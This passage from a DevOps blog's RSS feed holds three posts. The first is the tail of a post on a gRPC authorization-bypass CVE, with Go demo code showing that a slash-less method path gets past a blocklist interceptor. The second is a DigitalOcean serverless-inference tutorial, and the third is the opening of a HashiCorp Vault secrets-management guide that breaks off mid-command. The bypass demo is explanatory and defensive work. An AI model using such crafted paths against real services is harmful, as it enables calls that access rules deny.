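		Vulnerable:    reached(blocklistAllows(rawPath), lenientRoute(rawPath)),
		PatchedRouter: reached(blocklistAllows(rawPath), strictRoute(rawPath)),
		Hardened:      reached(allowlistAllows(rawPath), lenientRoute(rawPath)),
	}
}

func main() {
	// Constructed requests: each method with and without the leading slash.
	paths := []string{
		"/myapp.Orders/Cancel", "myapp.Orders/Cancel",
		"/myapp.Orders/Get", "myapp.Orders/Get",
	}
	for _, p := range paths {
		o := Evaluate(p)
		fmt.Printf("%-24q vulnerable=%-5t patched-router=%-5t hardened=%t\n",
			o.Path, o.Vulnerable, o.PatchedRouter, o.Hardened)
	}
}
```

<p>The slash-less <code>Cancel</code> request is the only denied call that gets through, and only in the first setup; the hardened interceptor rejects it even when the router underneath is still lenient.</p>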
<h2 id="h2-the-bigger-picture" class="group relative scroll-mt-24">
        <a href="#h2-the-bigger-picture" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The bigger picture
        </a>
        </h2><p>The uncomfortable part of CVE-2026-33186 is not the bug, which is small and now fixed. It is how many teams will read the headline, think &quot;we do not use gRPC,&quot; and move on, while a 9.1 sits three levels deep in their dependency graph under a Kubernetes client or a telemetry agent. Modern Go services pull in hundreds of modules; the ones that bite are rarely the ones you typed <code>go get</code> for.</p>
<p>So the takeaway is a habit, not a patch. Run <code>govulncheck ./...</code> in CI so a critical in a transitive dependency shows up as a failed build, not a blog post you skim eight months later. The leading slash is fixed. The next canonicalization bug in something you did not know you depended on is only a matter of time, and the audit that catches it takes about as long as reading this did.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Your First Serverless LLM Call on DigitalOcean in 10 Minutes]]></title>
      <link>https://devops-daily.com/posts/digitalocean-serverless-inference-first-call</link>
      <description><![CDATA[DigitalOcean's Inference Engine gives you an OpenAI-compatible endpoint with pay-per-token pricing and no GPU to manage. Here is the fastest path from zero to a working call, with curl, Python, and Node, every snippet run against the live API.]]></description>
      <pubDate>Mon, 22 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/digitalocean-serverless-inference-first-call</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[digitalocean]]></category><category><![CDATA[llm]]></category><category><![CDATA[inference]]></category><category><![CDATA[tutorial]]></category>
      <content:encoded><![CDATA[<p>Most &quot;get started with AI&quot; guides assume you want to stand up a GPU, pick a serving framework, and babysit it. For a lot of real work you do not. You want to send a prompt and get a completion back, pay for the tokens you used, and move on. That is what DigitalOcean&#39;s <strong>Inference Engine</strong> (part of its AI-Native Cloud) gives you: an OpenAI-compatible endpoint, a catalog of hosted models, pay-per-token billing, and no GPU to provision or scale.</p>
<p>Because the API speaks the OpenAI dialect, the practical version of &quot;getting started&quot; is mostly changing a base URL. This post takes you from nothing to a working call in about ten minutes, with curl, the OpenAI Python SDK, and the OpenAI Node SDK. Every snippet here was run against the live endpoint, so the responses and token counts you see are real.</p>
<h2 id="h2-what-you-need" class="group relative scroll-mt-24">
        <a href="#h2-what-you-need" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What you need
        </a>
        </h2><ul>
<li>A DigitalOcean account.</li>
<li>A couple of minutes to create a model access key.</li>
<li>curl, or Python 3, or Node, depending on which example you follow.</li>
</ul>
<p>That is the whole list. There is no GPU Droplet to create for this; serverless inference pools GPU capacity behind the endpoint and you pay only for tokens.</p>
<h2 id="h2-step-1-create-a-model-access-key" class="group relative scroll-mt-24">
        <a href="#h2-step-1-create-a-model-access-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: Create a model access key
        </a>
        </h2><p>In the DigitalOcean Control Panel, open the AI / Inference area and go to <strong>Model Access Keys</strong>, then <strong>Create model access key</strong>. Give it a name, and choose <strong>All models</strong> so the key can call any model in the catalog (you can scope a key to specific models later for production).</p>
<p>One setting is worth understanding before you click create: a model access key can be <strong>bound to a VPC</strong>. A VPC-scoped key only works for requests that originate from inside that DigitalOcean private network, which is exactly what you want in production (a leaked key is useless from the public internet). For this walkthrough, where you are calling from your laptop, leave the VPC restriction off, or you will get a <code>403 Forbidden</code> no matter how correct the rest of your request is. More on that in the troubleshooting note at the end.</p>
<p>Copy the key when it is shown and keep it somewhere safe. Then put it in your shell so the examples can read it:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">export</span> DO_INFERENCE_KEY=<span class="hljs-string">&quot;paste-your-key-here&quot;</span>
</code></pre><p>Treat this like any other secret: environment variable or secrets manager, never committed to a repo or pasted into frontend code.</p>
<h2 id="h2-step-2-your-first-call-with-curl" class="group relative scroll-mt-24">
        <a href="#h2-step-2-your-first-call-with-curl" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: Your first call with curl
        </a>
        </h2><p>The endpoint lives at <code>https://inference.do-ai.run/v1</code> and mirrors the OpenAI chat completions API. We will use <code>openai-gpt-oss-20b</code>, the cheapest text model in the catalog, which is plenty for a first call:</p>
<pre><code class="hljs language-bash">curl https://inference.do-ai.run/v1/chat/completions \
  -H <span class="hljs-string">&quot;Authorization: Bearer <span class="hljs-variable">$DO_INFERENCE_KEY</span>&quot;</span> \
  -H <span class="hljs-string">&quot;Content-Type: application/json&quot;</span> \
  -d <span class="hljs-string">&#x27;{
    &quot;model&quot;: &quot;openai-gpt-oss-20b&quot;,
    &quot;messages&quot;: [
      {&quot;role&quot;: &quot;system&quot;, &quot;content&quot;: &quot;You are a concise assistant.&quot;},
      {&quot;role&quot;: &quot;user&quot;, &quot;content&quot;: &quot;In one sentence, what is a reverse proxy?&quot;}
    ],
    &quot;max_tokens&quot;: 80
  }&#x27;</span>
</code></pre><p>The response is the standard OpenAI shape. Here is the real one this returned, trimmed for readability:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;object&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;chat.completion&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;model&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;choices&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
    <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;index&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">0</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;finish_reason&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;stop&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;message&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
        <span class="hljs-attr">&quot;role&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;assistant&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;content&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;A reverse proxy is a server that sits between clients and backend servers, receiving client requests and forwarding them to appropriate internal services while returning the responses, thereby abstracting and protecting the internal infrastructure.&quot;</span>
      <span class="hljs-punctuation">}</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">]</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;usage&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;prompt_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">87</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;completion_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">74</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;total_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">161</span>
  <span class="hljs-punctuation">}</span>
<span class="hljs-punctuation">}</span>
</code></pre><p>That is the entire round trip. No GPU, no model download, no cold-start wait you had to manage.</p>
<h2 id="h2-step-3-the-same-call-with-the-openai-python-sdk" class="group relative scroll-mt-24">
        <a href="#h2-step-3-the-same-call-with-the-openai-python-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: The same call with the OpenAI Python SDK
        </a>
        </h2><p>Because the API is OpenAI-compatible, you use the official <code>openai</code> library and point it at DigitalOcean by setting <code>base_url</code>. Nothing else about your code changes.</p>
<pre><code class="hljs language-bash">pip install openai
</code></pre><pre><code class="hljs language-python"><span class="hljs-keyword">import</span> os
<span class="hljs-keyword">from</span> openai <span class="hljs-keyword">import</span> OpenAI

client = OpenAI(
    base_url=<span class="hljs-string">&quot;https://inference.do-ai.run/v1&quot;</span>,
    api_key=os.environ[<span class="hljs-string">&quot;DO_INFERENCE_KEY&quot;</span>],
)

resp = client.chat.completions.create(
    model=<span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span>,
    messages=[
        {<span class="hljs-string">&quot;role&quot;</span>: <span class="hljs-string">&quot;system&quot;</span>, <span class="hljs-string">&quot;content&quot;</span>: <span class="hljs-string">&quot;You are a concise assistant.&quot;</span>},
        {<span class="hljs-string">&quot;role&quot;</span>: <span class="hljs-string">&quot;user&quot;</span>, <span class="hljs-string">&quot;content&quot;</span>: <span class="hljs-string">&quot;In one sentence, what is a reverse proxy?&quot;</span>},
    ],
    max_tokens=<span class="hljs-number">80</span>,
)

<span class="hljs-built_in">print</span>(resp.choices[<span class="hljs-number">0</span>].message.content)
<span class="hljs-built_in">print</span>(resp.usage.prompt_tokens, <span class="hljs-string">&quot;in /&quot;</span>, resp.usage.completion_tokens, <span class="hljs-string">&quot;out&quot;</span>)
</code></pre><p>Run against the live endpoint (tested with <code>openai</code> 2.43.0), this printed:</p>
<pre><code class="hljs language-text">A reverse proxy is a server that lies between clients and backend servers,
forwarding client requests to those servers and returning the servers&#x27; responses
back to the clients.
87 in / 91 out
</code></pre><p>If you have an existing app built on the OpenAI SDK, this is the whole migration: change <code>base_url</code>, change the API key, change the model name.</p>
<h2 id="h2-step-4-the-same-call-with-the-openai-node-sdk" class="group relative scroll-mt-24">
        <a href="#h2-step-4-the-same-call-with-the-openai-node-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: The same call with the OpenAI Node SDK
        </a>
        </h2><p>Identical story in JavaScript. Install the SDK and set <code>baseURL</code>:</p>
<pre><code class="hljs language-bash">npm install openai
</code></pre><pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> <span class="hljs-title class_">OpenAI</span> <span class="hljs-keyword">from</span> <span class="hljs-string">&quot;openai&quot;</span>;

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> <span class="hljs-title class_">OpenAI</span>({
  <span class="hljs-attr">baseURL</span>: <span class="hljs-string">&quot;https://inference.do-ai.run/v1&quot;</span>,
  <span class="hljs-attr">apiKey</span>: process.<span class="hljs-property">env</span>.<span class="hljs-property">DO_INFERENCE_KEY</span>,
});

<span class="hljs-keyword">const</span> resp = <span class="hljs-keyword">await</span> client.<span class="hljs-property">chat</span>.<span class="hljs-property">completions</span>.<span class="hljs-title function_">create</span>({
  <span class="hljs-attr">model</span>: <span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span>,
  <span class="hljs-attr">messages</span>: [
    { <span class="hljs-attr">role</span>: <span class="hljs-string">&quot;system&quot;</span>, <span class="hljs-attr">content</span>: <span class="hljs-string">&quot;You are a concise assistant.&quot;</span> },
    { <span class="hljs-attr">role</span>: <span class="hljs-string">&quot;user&quot;</span>, <span class="hljs-attr">content</span>: <span class="hljs-string">&quot;In one sentence, what is a reverse proxy?&quot;</span> },
  ],
  <span class="hljs-attr">max_tokens</span>: <span class="hljs-number">80</span>,
});

<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(resp.<span class="hljs-property">choices</span>[<span class="hljs-number">0</span>].<span class="hljs-property">message</span>.<span class="hljs-property">content</span>);
<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(resp.<span class="hljs-property">usage</span>.<span class="hljs-property">prompt_tokens</span>, <span class="hljs-string">&quot;in /&quot;</span>, resp.<span class="hljs-property">usage</span>.<span class="hljs-property">completion_tokens</span>, <span class="hljs-string">&quot;out&quot;</span>);
</code></pre><p>Tested with <code>openai</code> 6.44.0 for Node, this returned:</p>
<pre><code class="hljs language-text">A reverse proxy is a server that sits between clients and backend servers,
forwarding client requests to the appropriate server and returning the server&#x27;s
response, often providing load balancing, SSL termination, or caching.
87 in / 62 out
</code></pre><h2 id="h2-reading-the-response" class="group relative scroll-mt-24">
        <a href="#h2-reading-the-response" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Reading the response
        </a>
        </h2><p>Two fields are worth knowing about beyond the obvious <code>content</code>:</p>
<ul>
<li><strong><code>usage</code></strong> is how you reason about cost. Every call reports <code>prompt_tokens</code>, <code>completion_tokens</code>, and <code>total_tokens</code>. Billing is per token, so this object is your meter.</li>
<li>The <code>gpt-oss</code> models also return a <code>reasoning_content</code> field alongside <code>content</code>, holding the model&#39;s intermediate reasoning. You usually render <code>content</code> to users and keep <code>reasoning_content</code> for debugging or logging.</li>
</ul>
<p>To see the full catalog of model slugs you can pass as <code>model</code>, hit the models endpoint:</p>
<pre><code class="hljs language-bash">curl https://inference.do-ai.run/v1/models \
  -H <span class="hljs-string">&quot;Authorization: Bearer <span class="hljs-variable">$DO_INFERENCE_KEY</span>&quot;</span>
</code></pre><p>At the time of writing that returns 67 models, spanning OpenAI (<code>openai-gpt-5.5</code>, <code>openai-gpt-4o-mini</code>, the open <code>openai-gpt-oss-20b</code> and <code>openai-gpt-oss-120b</code>), Anthropic (<code>anthropic-claude-opus-4.8</code>, <code>anthropic-claude-4.6-sonnet</code>, <code>anthropic-claude-haiku-4.5</code>), Meta Llama, Mistral, DeepSeek, NVIDIA Nemotron, and embedding and image models. Switching models is a one-string change.</p>
<h2 id="h2-what-it-costs" class="group relative scroll-mt-24">
        <a href="#h2-what-it-costs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it costs
        </a>
        </h2><p>The model we used, <code>gpt-oss-20b</code>, is billed at <strong>$0.05 per 1M input tokens and $0.45 per 1M output tokens</strong>. The call in Step 2 used 87 input and 74 output tokens, which works out to about four thousandths of a cent. You can run this tutorial hundreds of times before it rounds up to a penny.</p>
<p>Switching models is a one-string change, and the price range across the catalog is wide. Output tokens are the cost driver (they are more expensive than input on every model), and the small open models sit far below the frontier ones:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Output price per 1M tokens, by model&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;DigitalOcean Inference Engine list prices, June 2026. Input tokens are cheaper than output on every model.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;deepseek-v4-flash&quot;,&quot;value&quot;:0.28,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-20b&quot;,&quot;value&quot;:0.45,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-4o-mini&quot;,&quot;value&quot;:0.6,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;llama3.3-70b&quot;,&quot;value&quot;:0.65,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-120b&quot;,&quot;value&quot;:0.7,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:5,&quot;series&quot;:&quot;frontier&quot;},{&quot;label&quot;:&quot;claude-sonnet-4.6&quot;,&quot;value&quot;:15,&quot;series&quot;:&quot;frontier&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;open / small&quot;,&quot;color&quot;:&quot;#34d399&quot;},{&quot;name&quot;:&quot;frontier&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>Rates are abstract, so here is the concrete version: the exact prompt from this tutorial (87 input, 74 output tokens), run 100,000 times, priced on each model. The same workload swings from a few dollars on a small open model to over a hundred on a frontier one:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Cost per 100,000 calls (this tutorial's prompt: 87 in / 74 out)&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;Same request, different model, at June 2026 list prices. Pick the smallest model that clears your quality bar.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;deepseek-v4-flash&quot;,&quot;value&quot;:3.29,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-20b&quot;,&quot;value&quot;:3.77,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-4o-mini&quot;,&quot;value&quot;:5.75,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-120b&quot;,&quot;value&quot;:6.05,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;llama3.3-70b&quot;,&quot;value&quot;:10.47,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:45.7,&quot;series&quot;:&quot;frontier&quot;},{&quot;label&quot;:&quot;claude-sonnet-4.6&quot;,&quot;value&quot;:137.1,&quot;series&quot;:&quot;frontier&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;open / small&quot;,&quot;color&quot;:&quot;#34d399&quot;},{&quot;name&quot;:&quot;frontier&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>The pricing model matters as much as the number. You pay per token, not per GPU-hour, because serverless inference pools GPU capacity across customers, so an idle app costs nothing. DigitalOcean also applies a small off-peak discount on eligible open models during overnight hours, which is worth knowing if you run large batch jobs you can schedule. The practical rule the second chart points at: start on the cheapest model that clears your quality bar, and only reach for a frontier model on the prompts that genuinely need it.</p>
<h2 id="h2-a-note-on-that-403-vpc-scoping" class="group relative scroll-mt-24">
        <a href="#h2-a-note-on-that-403-vpc-scoping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A note on that 403 (VPC scoping)
        </a>
        </h2><p>If your very first call comes back as <code>403 Forbidden</code> even though the key is correct and has access to all models, check whether the key is bound to a VPC. A VPC-scoped key is rejected for any request that does not originate inside that private network. That is a feature, not a bug: in production you want your inference key locked to your VPC so it cannot be used from anywhere else. For local testing from your laptop, create a key with no VPC restriction (and delete it when you are done), or run your test from a Droplet inside the VPC.</p>
<p>It is a good habit to adopt the moment you go past experimenting: scope the production key to your VPC, scope it to only the models you actually call, and set an expiration date.</p>
<h2 id="h2-where-to-go-next" class="group relative scroll-mt-24">
        <a href="#h2-where-to-go-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to go next
        </a>
        </h2><p>You now have a working, OpenAI-compatible LLM call with nothing to operate. From here:</p>
<ul>
<li><strong>Swap the model</strong> to match the task. Use a small open model like <code>gpt-oss-20b</code> for cheap, high-volume work and a frontier model for the hard prompts, changing one string.</li>
<li><strong>Add retrieval</strong> with DigitalOcean&#39;s Knowledge Bases and managed Weaviate when you need answers grounded in your own data.</li>
<li><strong>Reach for dedicated inference</strong> if you need predictable latency for a single model under steady load, rather than the pooled serverless tier.</li>
<li><strong>Build an agent</strong> when a single call is not enough. If you go that route, our take on <a href="https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break">what AI SRE agents actually fix and what they break</a> is worth reading before you give one access to anything that matters.</li>
</ul>
<p>The thing that makes this approachable is the same thing that makes it easy to leave if you ever want to: it is just the OpenAI API with a different base URL. Start with the cheap model and a curl command, and grow into the rest only when a real requirement asks for it.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Secrets Management Best Practices with HashiCorp Vault]]></title>
      <link>https://devops-daily.com/posts/hashicorp-vault-secrets-management-best-practices</link>
      <description><![CDATA[Run HashiCorp Vault the way production needs it: auto-unseal, AppRole auth for machines, dynamic database credentials that expire on their own, and encryption as a service. Real config, real terminal output.]]></description>
      <pubDate>Mon, 22 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hashicorp-vault-secrets-management-best-practices</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[vault]]></category><category><![CDATA[secrets-management]]></category><category><![CDATA[security]]></category><category><![CDATA[dynamic-secrets]]></category><category><![CDATA[encryption]]></category>
      <content:encoded><![CDATA[<p>A database password leaks. Maybe it was committed to a private repo three years ago, maybe it sat in a CI log, maybe a contractor copied it into a Slack DM. You do not know, because that password has been valid the entire time and nobody rotated it. Now you are in an incident channel at 2am trying to figure out the blast radius of a credential that every service, every old laptop, and every backup job has used since 2023.</p>
<p>This is the problem HashiCorp Vault solves, and it is not the problem most teams use it for. Most teams install Vault, run it in dev mode, dump a pile of static key-value secrets into it, and call it done. That gives you an encrypted password store with a nicer API. Useful, but it leaves the worst part untouched: secrets that live forever and that no human can fully account for.</p>
<p>The real win with Vault is making secrets short-lived and generated on demand, so a leak has an expiry date measured in hours instead of years. This post shows how to run Vault for that: a production server that survives reboots, machine authentication that does not depend on root tokens, dynamic database credentials, and encryption as a service. Every command here is one you can run.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Never run <code>vault server -dev</code> for anything real. It is in-memory and unsealed, so a restart wipes every secret.</li>
<li>Use auto-unseal (AWS KMS, GCP KMS, or another Vault) so a reboot does not need five humans with key shares.</li>
<li>Authenticate machines with <strong>AppRole</strong>, not long-lived root or service tokens.</li>
<li>Use <strong>dynamic secrets</strong> for databases. Vault creates a unique DB user per request with a short TTL and deletes it when the lease ends.</li>
<li>Use the <strong>transit engine</strong> for encryption as a service so your apps never touch the encryption keys.</li>
<li>Write least-privilege policies, turn on the audit log, and revoke leases when something goes wrong.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A Linux host (or VM) where you can install the Vault binary</li>
<li>Vault 1.15 or newer (<code>vault version</code> to check)</li>
<li>A PostgreSQL database you can point Vault at for the dynamic secrets section</li>
<li>An AWS account with a KMS key if you want auto-unseal (optional but recommended)</li>
<li>Basic comfort with the command line and HCL config files</li>
</ul>
<h2 id="h2-stop-running-vault-in-dev-mode" class="group relative scroll-mt-24">
        <a href="#h2-stop-running-vault-in-dev-mode" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Stop running Vault in dev mode
        </a>
        </h2><p>Dev mode is the trap. You run one command and get a working Vault:</p>
<pre><code class="hljs language-bash">vault server -dev
</code></pre><pre><code class="hljs language-text">==&gt; Vault server configuration:
             Api Address: http://127.0.0.1:8200
                     Cgo: disabled
         Cluster Address: https://127.0.0.1:8201
              Listener 1: tcp (addr: &quot;127.0.0.1:8200&quot;, tls: &quot;disabled&quot;)
               Log Level: info
                   Mlock: supported: true, enabled: false
           Recovery Mode: false
                 Storage: inmem

WARNING! dev mode is enabled! In this mode, Vault runs entirely in-memory
and starts unsealed with a single unseal key.
</code></pre><p>Read that warning. <code>Storage: inmem</code> means every secret lives in RAM and disappears on restart. <code>tls: disabled</code> means traffic is plaintext. It starts unsealed, so anyone who reaches port 8200 owns it. Dev mode is for trying commands on your laptop, nothing else.</p>
<p>A production server needs three things dev mode skips: persistent storage, TLS, and a seal. Here is a real <code>vault.hcl</code> using integrated Raft storage and AWS KMS auto-unseal:</p>
<pre><code class="hljs language-hcl"><span class="hljs-comment"># /etc/vault.d/vault.hcl</span>
storage <span class="hljs-string">&quot;raft&quot;</span> {
  path    = <span class="hljs-string">&quot;/opt/vault/data&quot;</span>
  node_id = <span class="hljs-string">&quot;vault-1&quot;</span>
}

listener <span class="hljs-string">&quot;tcp&quot;</span> {
  address       = <span class="hljs-string">&quot;0.0.0.0:8200&quot;</span>
  tls_cert_file = <span class="hljs-string">&quot;/opt/vault/tls/vault.crt&quot;</span>
  tls_key_file  = <span class="hljs-string">&quot;/opt/vault/tls/vault.key&quot;</span>
}

<span class="hljs-comment"># Auto-unseal: Vault asks KMS to decrypt its root key on boot.</span>
<span class="hljs-comment"># No more gathering humans with key shares after every restart.</span>
seal <span class="hljs-string">&quot;awskms&quot;</span> {
  region     = <span class="hljs-string">&quot;us-east-1&quot;</span>
  kms_key_id = <span class="hljs-string">&quot;arn:aws:kms:us-east-1:111122223333:key/abc-12345&quot;</span>
}

api_addr     = <span class="hljs-string">&quot;https://vault-1.internal:8200&quot;</span>
cluster_addr = <span class="hljs-string">&quot;https://vault-1.internal:8201&quot;</span>
ui           = true
</code></pre><p>Start it and initialize once:</p>
<pre><code class="hljs language-bash">vault server -config=/etc/vault.d/vault.hcl &amp;

<span class="hljs-built_in">export</span> VAULT_ADDR=<span class="hljs-string">&quot;https://vault-1.internal:8200&quot;</span>
vault operator init -recovery-shares=5 -recovery-threshold=3
</code></pre><pre><code class="hljs language-text">Recovery Key 1: vR2k9... (give to a different person than key 2)
Recovery Key 2: 8Lp4m...
Recovery Key 3: qW7nZ...
Recovery Key 4: 3xF8t...
Recovery Key 5: hT1bY...

Initial Root Token: hvs.CAESIJ...

Success! Vault is initialized

Recovery key initialized with 5 key shares and a key threshold of 3.
</code></pre><p>Because of auto-unseal you get <strong>recovery keys</strong> instead of unseal keys. Vault unseals itself on boot using KMS, and the recovery keys are only for emergencies like regenerating the root token. Split them across different people and store them offline. Never keep all of them in one place.</p>
<p>Now use that root token once to set up authentication and policies, then throw it away. Root tokens are for break-glass moments, not daily use.</p>
<pre><code class="hljs language-bash">vault login hvs.CAESIJ...
</code></pre><p>If you ever see this, your Vault restarted and could not reach its seal:</p>
<pre><code class="hljs language-text">$ vault kv get secret/payments/stripe
Error making API request.
URL: GET https://vault-1.internal:8200/v1/secret/data/payments/stripe
Code: 503. Errors:
* Vault is sealed
</code></pre><p>A sealed Vault answers nothing. That is the whole point. Auto-unseal exists so this state heals itself instead of paging you.</p>
<h2 id="h2-authenticate-machines-with-approle-not-tokens" class="group relative scroll-mt-24">
        <a href="#h2-authenticate-machines-with-approle-not-tokens" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Authenticate machines with AppRole, not tokens
        </a>
        </h2><p>A common mistake: generate a long-lived token, paste it into an app&#39;s environment, and forget it exists. Now you have the same forever-credential problem one layer up. If that token leaks, it works until someone notices.</p>
<p>For machines, use <strong>AppRole</strong>. The app proves its identity with a <code>role_id</code> (think username, not very secret) and a <code>secret_id</code> (think password, short-lived and delivered separately), and gets back a token scoped to exactly what it needs.</p>
<pre><code class="hljs language-bash">vault auth <span class="hljs-built_in">enable</span> approle

<span class="hljs-comment"># Create a role for the payments service.</span>
vault write auth/approle/role/payments-api \
    token_policies=<span class="hljs-string">&quot;payments-api&quot;</span> \
    token_ttl=1h \
    token_max_ttl=4h \
    secret_id_ttl=24h \
    secret_id_num_uses=1

<span class="hljs-comment"># role_id is stable and tied to the role.</span>
vault <span class="hljs-built_in">read</span> auth/approle/role/payments-api/role-id
</code></pre><pre><code class="hljs language-text">Key        Value
---        -----
role_id    7b1c4e2a-9f3d-4a8e-b6c1-2d5f8e0a1b3c
</code></pre><p>The <code>secret_id</code> is the part that needs care. Generate it just before the app starts and hand it over once. With <code>secret_id_num_uses=1</code> it works exactly one time, so once the app has logged in, a <code>secret_id</code> that leaks into a log is already useless.</p>
<pre><code class="hljs language-bash">vault write -f auth/approle/role/payments-api/secret-id
</code></pre><pre><code class="hljs language-text">Key                   Value
---                   -----
secret_id             d8a3...e91f
secret_id_accessor    4c2b...77a0
secret_id_ttl         24h
</code></pre><p>The app logs in with both and gets a short-lived token:</p>
<pre><code class="hljs language-bash">vault write auth/approle/login \
    role_id=<span class="hljs-string">&quot;7b1c4e2a-9f3d-4a8e-b6c1-2d5f8e0a1b3c&quot;</span> \
    secret_id=<span class="hljs-string">&quot;d8a3...e91f&quot;</span>
</code></pre><pre><code class="hljs language-text">Key                  Value
---                  -----
token                hvs.CAESI...
token_duration       1h
token_renewable      true
token_policies       [&quot;default&quot; &quot;payments-api&quot;]
</code></pre><p>That token dies in an hour unless the app renews it. The pattern that delivers the <code>secret_id</code> securely (a sidecar, a cloud instance identity, or Vault Agent) is its own topic, but the rule is simple: the <code>role_id</code> can live in config, the <code>secret_id</code> should be freshly minted and single-use.</p>
<h2 id="h2-dynamic-database-credentials" class="group relative scroll-mt-24">
        <a href="#h2-dynamic-database-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Dynamic database credentials
        </a>
        </h2><p>This is the feature that changes how you think about secrets. Instead of one shared database password that every service knows, Vault creates a brand new database user for each request, with a short TTL, and deletes it when the lease expires.</p>
<p>Enable the database engine and point it at PostgreSQL:</p>
<pre><code class="hljs language-bash">vault secrets <span class="hljs-built_in">enable</span> database

vault write database/config/orders-db \
    plugin_name=<span class="hljs-string">&quot;postgresql-database-plugin&quot;</span> \
    allowed_roles=<span class="hljs-string">&quot;orders-readonly&quot;</span> \
